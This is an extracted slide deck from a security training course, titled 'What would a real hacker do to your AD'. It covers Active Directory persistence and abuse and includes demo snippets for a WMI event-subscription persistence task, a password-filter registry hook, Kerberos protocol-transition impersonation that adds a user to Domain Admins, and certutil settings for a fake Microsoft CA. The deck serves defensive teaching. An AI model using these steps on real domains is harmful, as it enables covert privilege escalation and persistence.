1. What would a real hacker do to your AD GOPAS: info@gopas,cz | www.gopas.cz | www.facebook.com/P.S.GOPAS Ing. Ondřej Ševeček | GOPAS a.s. | MCM: Directory Services | MVP: Enterprise Security | Certified Ethical Hacker | ondrej@sevecek.com | www.sevecek.com |

2. Intro  What happens when they take one of your DCs?  You are doomed must reinstall the whole forest from scratch may be able to restore the whole forest from last clean backup provided you are sure the intrusion will not happen again

3. Why do I show these things  Secure machines physically  Do not use domain admin credentials on insecure machines  Separate administrative accounts  Never use admin accounts to access services  Stress on strong passwords or rather use smart cards

4. Agenda  Physical DC security  Password filters  Hidden accounts  Hidden scheduled tasks  Forest is a security boundary  Exploiting Kerberos delegation  Logon without passwords

5. Physical DC security  Having physical access means you have full power over data, settings and binaries partially substitute physical security with BitLocker and TPM use RODCs at insecure locations  Hardware keyloggers  Reboot and offline modifications

6. Password filters  Password change/reset after an attack means nothing  HKYE_LOCAL_MACHINE System CurrentControlSet Control LSA NotificationPackages = MULTI_SZ

7. Hidden accounts  You are never able to do a 100% security audit after an attack  Not even Domain Admins can see everything

8. Hidden scheduled tasks  You are never able to do a 100% security audit after an attack  Not even the prominent audit tools know everything root\subscription ActiveScriptEventConsumer  Name =  ScriptEngine = VBScript  ScriptText = set fso = CreateObject("Scripting.FileSystemObject") : fileName = "c:\showit" & "-" & Year(Now) & "-" & Month(Now) & "-" & Day(Now) & "-" & Hour(Now) & "-" & Minute(Now) & "-" & Second(Now) & ".txt" : set newFile = fso.CreateTextFile(fileName) : newFile.WriteLine("I will be here for ever!") : newFile.Close()

9. Hidden scheduled tasks  You are never able to do a 100% security audit after an attack  … continuing … __EventFilter  Name =  QueryLanguage = WQL  EventNamespace = root\cimv2  Query = SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA "Win32_LocalTime" AND TargetInstance.Second = 9  Second, Minute, Hour, DayOfWeek, Month, Quarter, Year, WeekInMonth

10. Forest is a security boundary  Domain Admins from any domain of a forest are also Domain Admins in any other domain as well  Site level GPOs  No SID filtering inside forest  NTAuth CAs  Stealing KDC passwords (krbtgt account)  …

11. DE. gopas.virtual Subdomain scenario gopas.virtual CZ. gopas.virtual DE. gopas.virtual

12. Kerberos delegation with protocol transition  Password is not the only means how to log on to network services no credentials necessary at all  Trust this computer to specified services only Any authentication protocol

13. Kerberos delegation Client App Server DB LDAP FS Kamil

14. App Server DB LDAP FS Kamil Kerberos delegation with protocol transition

15. Delegation with PowerShell Adjust-Privilege 7 $true $winId = New-Object System.Security.Principal.WindowsIdentity 'kamil@gopas.cz' [Security.Principal.WindowsIdentity]::GetCurrent() $winId.Impersonate() [Security.Principal.WindowsIdentity]::GetCurrent() $domainAdmins = [ADSI] 'LDAP://CN=Domain Admins,CN=Users,DC=gopas,DC=virtual' $domainAdmins.Add('LDAP://CN=Leos,OU=People,OU=Company,D C=gopas,DC=virtual')

16. Smart card logon  Password is not the only means how to log on to computers  NTAuth CA forest wide trust do not need to consult AD or touch LDAP at all  Notes ldap:///CN=GOPAS%20Root%20Online%20CA,CN=DC1,C N=CDP,CN=Public%20Key%20Services,CN=Services,CN= Configuration,DC=gopas,DC=virtual?certificateRevocationLi st?base?objectClass=cRLDistributionPoint

17. Fake Microsoft CA  Something must always be trusted  Root CA CN=Microsoft Root Authority,OU=Microsoft Corporation,OU=Copyright (c) 1997 Microsoft Corp.  Code signing cert CN=Microsoft Corporation,OU=MOPR,O=Microsoft Corporation,L=Redmond,S=Washington,C=US

18. Fake Microsoft CA  Longer validity for issued certificates CERTUTIL -setreg CA\ValidityPeriodUnits 5  No certificate template name extension CERTUTIL -setreg policy\DisableExtensionList +1.3.6.1.4.1.311.21.7  No CRL paths into issued certificates certutil -setreg DBFlags +DBFLAGS_ENABLEVOLATILEREQUESTS

19. NASHLEDANOU GOPAS: info@gopas,cz | www.gopas.cz | www.facebook.com/P.S.GOPAS na kurzech v počítačové škole GOPAS, a.s. GOC171 - Active Directory Troubleshooting GOC172 - Kerberos Troubleshooting GOC173 - Enterprise PKI Deployment GOC175 - Administering Security